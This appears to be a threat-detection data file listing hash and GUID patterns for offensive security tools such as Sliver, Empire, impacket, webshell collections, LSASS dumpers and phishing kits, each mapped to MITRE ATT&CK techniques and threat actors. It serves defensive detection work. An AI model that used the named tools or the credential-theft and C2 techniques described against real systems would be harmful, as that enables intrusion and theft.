"*950fd036a54ec99522231614375eff9aaa6dfff0414090b24b0f394c7810e408*",".{0,1000}950fd036a54ec99522231614375eff9aaa6dfff0414090b24b0f394c7810e408.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31371"
"*951575758d87951838e7afe524f008ba71c75b88738c66f7a753f05d47937017*",".{0,1000}951575758d87951838e7afe524f008ba71c75b88738c66f7a753f05d47937017.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31375"
"*9521883a37c093f31e9d3fde7d3293f637ea51ce573c3fa7967843b7e51d8dd0*",".{0,1000}9521883a37c093f31e9d3fde7d3293f637ea51ce573c3fa7967843b7e51d8dd0.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","31376"
"*9521883a37c093f31e9d3fde7d3293f637ea51ce573c3fa7967843b7e51d8dd0*",".{0,1000}9521883a37c093f31e9d3fde7d3293f637ea51ce573c3fa7967843b7e51d8dd0.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","31377"
"*9521c213fdd6e0b58f1288a67dbbc2b178233e2d46d09feb8da1727520340d48*",".{0,1000}9521c213fdd6e0b58f1288a67dbbc2b178233e2d46d09feb8da1727520340d48.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","31378"
"*952868f75bda8b0eeb8f632ae0e549d58bcd1dfe5d4bfa3d7ae385f03bfb25fe*",".{0,1000}952868f75bda8b0eeb8f632ae0e549d58bcd1dfe5d4bfa3d7ae385f03bfb25fe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31380"
"*952c94381c139e9d0b212d7f854ad261827e6694eac3e17b2c606ff9f54a7e91*",".{0,1000}952c94381c139e9d0b212d7f854ad261827e6694eac3e17b2c606ff9f54a7e91.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","#filehash","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","31381"
"*953e3673f6aeda854ed73b54de0c6faa1c38ea80e6b13b3ea010bb56ad79cfb6*",".{0,1000}953e3673f6aeda854ed73b54de0c6faa1c38ea80e6b13b3ea010bb56ad79cfb6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31384"
"*95451ba9e548f9e140de232b85cdf6541438e20d7c58e01eeb3011b87dbcd292*",".{0,1000}95451ba9e548f9e140de232b85cdf6541438e20d7c58e01eeb3011b87dbcd292.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31385"
"*9549130cf3c479190977cf265b672fcd9a6dcab81d085e01d362eac660dfdd39*",".{0,1000}9549130cf3c479190977cf265b672fcd9a6dcab81d085e01d362eac660dfdd39.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31387"
"*95494fd45d6bc11bc49f1e41af352f896b7ada9c5eadeb029d6463def8bd60cd*",".{0,1000}95494fd45d6bc11bc49f1e41af352f896b7ada9c5eadeb029d6463def8bd60cd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31388"
"*954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97*",".{0,1000}954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31389"
"*95502b5e-5763-4ec5-a64c-1e9e33409e2f*",".{0,1000}95502b5e\-5763\-4ec5\-a64c\-1e9e33409e2f.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","0","#GUIDproject","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","31391"
"*955201aaf535183bd7a881278fbaab7a16f742c150ff44e1d7ab0325c0c03baf*",".{0,1000}955201aaf535183bd7a881278fbaab7a16f742c150ff44e1d7ab0325c0c03baf.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#filehash #linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","31392"
"*95529189-2fb6-49e4-ab2d-3c925ada4414*",".{0,1000}95529189\-2fb6\-49e4\-ab2d\-3c925ada4414.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","#GUIDproject","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","31393"
"*9555ccebd8cee6d9f1d08bc5f2386c210cfd3930553e153f567a1d1d12403c29*",".{0,1000}9555ccebd8cee6d9f1d08bc5f2386c210cfd3930553e153f567a1d1d12403c29.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31394"
"*95650a1f11040590015b106d08d5453b09acdb02484ddce02f929953ca8a7149*",".{0,1000}95650a1f11040590015b106d08d5453b09acdb02484ddce02f929953ca8a7149.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31398"
"*9566f875d51e0259d3d64d6a20250ffaffd527e17e060cde0b77dea42a10a13e*",".{0,1000}9566f875d51e0259d3d64d6a20250ffaffd527e17e060cde0b77dea42a10a13e.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","31400"
"*9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18*",".{0,1000}9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","31401"
"*956f0e02e10050586c0a0fedbf9da70b2204726342485f8400eb0804eaadeb6c*",".{0,1000}956f0e02e10050586c0a0fedbf9da70b2204726342485f8400eb0804eaadeb6c.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","31404"
"*957a85413b6979ee849ae5b802066eeab409bef45da76540a8d6f561bc0a36a0*",".{0,1000}957a85413b6979ee849ae5b802066eeab409bef45da76540a8d6f561bc0a36a0.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31405"
"*957e5ed833379f0a82f9424055e8b4159bbd205c291b1210bccf689cdfb22d0f*",".{0,1000}957e5ed833379f0a82f9424055e8b4159bbd205c291b1210bccf689cdfb22d0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31407"
"*958af18a7de60d885d3f792d8a0b0829aee5507cdcbbf2d23208e45c57239727*",".{0,1000}958af18a7de60d885d3f792d8a0b0829aee5507cdcbbf2d23208e45c57239727.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31408"
"*9593cc106f75cc415faadbeb5b16fa79cfe8c047ad007d50dbf8cb1d242126de*",".{0,1000}9593cc106f75cc415faadbeb5b16fa79cfe8c047ad007d50dbf8cb1d242126de.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#filehash","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","31411"
"*959818e89008c47a0f515ac6f000163c9ff6a9a0cc094d42d1a823ab3f461d22*",".{0,1000}959818e89008c47a0f515ac6f000163c9ff6a9a0cc094d42d1a823ab3f461d22.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31412"
"*959e83965543c8843feb6db4e1caca99803a59c6bbcb8786a80dd25ec6fba0bc*",".{0,1000}959e83965543c8843feb6db4e1caca99803a59c6bbcb8786a80dd25ec6fba0bc.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31416"
"*95A40D7C-F3F7-4C45-8C5A-D384DE50B6C9*",".{0,1000}95A40D7C\-F3F7\-4C45\-8C5A\-D384DE50B6C9.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","#GUIDproject","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","31417"
"*95aa09723c700a9e1bb225c70c26ac6f63169089ab7ae3ecdbb9b67fb23740dd*",".{0,1000}95aa09723c700a9e1bb225c70c26ac6f63169089ab7ae3ecdbb9b67fb23740dd.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31418"
"*95ae5c9ab4faf301a44b0c4c0d98d88fd12191667b0f8c78cf933b32df3ff577*",".{0,1000}95ae5c9ab4faf301a44b0c4c0d98d88fd12191667b0f8c78cf933b32df3ff577.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","31419"
"*95b9a6d12b978a6c1bbd6a33369e39008e7d64544d50c98c9c3f2b93a9466e79*",".{0,1000}95b9a6d12b978a6c1bbd6a33369e39008e7d64544d50c98c9c3f2b93a9466e79.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","#filehash","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","31420"
"*95BB9D5E-260F-4A70-B0FA-0757A94EF677*",".{0,1000}95BB9D5E\-260F\-4A70\-B0FA\-0757A94EF677.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31421"
"*95BC2C38-1FBE-4AF1-967E-BC133250C4D4*",".{0,1000}95BC2C38\-1FBE\-4AF1\-967E\-BC133250C4D4.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#GUIDproject","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","31422"
"*95bc7379dc7a1f1a8b571ae0ba24937e3d7d5423c3c917a1550dddd0e056e8a9*",".{0,1000}95bc7379dc7a1f1a8b571ae0ba24937e3d7d5423c3c917a1550dddd0e056e8a9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31423"
"*95cb237e34c83f5922c36da70cf5e0b2e1af5729322da2c45be05c107a0f9ab0*",".{0,1000}95cb237e34c83f5922c36da70cf5e0b2e1af5729322da2c45be05c107a0f9ab0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31425"
"*95ce7bcdf3de537ac2cd09e33663d522dd5156f49a565ff54007d9f70345a1b9*",".{0,1000}95ce7bcdf3de537ac2cd09e33663d522dd5156f49a565ff54007d9f70345a1b9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31426"
"*95d19ae58bbd6b38b4988fae5c7b514c8451a15e940f1392bcf1f93374364054*",".{0,1000}95d19ae58bbd6b38b4988fae5c7b514c8451a15e940f1392bcf1f93374364054.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","#filehash","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","31427"
"*95d2ea175a231758503f47fa5c3bcbe647327b9deaae76808b6dda647b574ecd*",".{0,1000}95d2ea175a231758503f47fa5c3bcbe647327b9deaae76808b6dda647b574ecd.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","31428"
"*95d2ea175a231758503f47fa5c3bcbe647327b9deaae76808b6dda647b574ecd*",".{0,1000}95d2ea175a231758503f47fa5c3bcbe647327b9deaae76808b6dda647b574ecd.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","31429"
"*95dcf74d21d688a7f2b887af56aeeae19c0d788ed863746f1edf19539a67ad37*",".{0,1000}95dcf74d21d688a7f2b887af56aeeae19c0d788ed863746f1edf19539a67ad37.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","31431"
"*95dd437c805fb71cb3cda5f20ad9b212c44f14dc09194867125acb289af6301b*",".{0,1000}95dd437c805fb71cb3cda5f20ad9b212c44f14dc09194867125acb289af6301b.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","31432"
"*95dd52dbd82039a3f19a2bf8b4517b188d27bec4907cfc7f1796b7fa09c68c28*",".{0,1000}95dd52dbd82039a3f19a2bf8b4517b188d27bec4907cfc7f1796b7fa09c68c28.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","31433"
"*95de28d722e08cb378d1c8d3c5338aa707f43e1f23d5bb03460957d46e80b440*",".{0,1000}95de28d722e08cb378d1c8d3c5338aa707f43e1f23d5bb03460957d46e80b440.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31434"
"*95df94b5f2e9428ee39f9f6706fd746a116a8afe9eeb3b318c576bbb934e35a4*",".{0,1000}95df94b5f2e9428ee39f9f6706fd746a116a8afe9eeb3b318c576bbb934e35a4.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","31435"
"*95ea0b9f5014787d2743ece13f2800e15e4e24a4c3b2c57576a8cdf49db88c0c*",".{0,1000}95ea0b9f5014787d2743ece13f2800e15e4e24a4c3b2c57576a8cdf49db88c0c.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","31437"
"*95f159db9ba6cbe6219d80ce17e7360e5906094333cc595190d683a45d9911f6*",".{0,1000}95f159db9ba6cbe6219d80ce17e7360e5906094333cc595190d683a45d9911f6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31441"
"*95f9539c17bfa24ee0d7206b1fb2b195885b94e82d6bd7276bfccf2f0ceb9ac4*",".{0,1000}95f9539c17bfa24ee0d7206b1fb2b195885b94e82d6bd7276bfccf2f0ceb9ac4.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","31444"
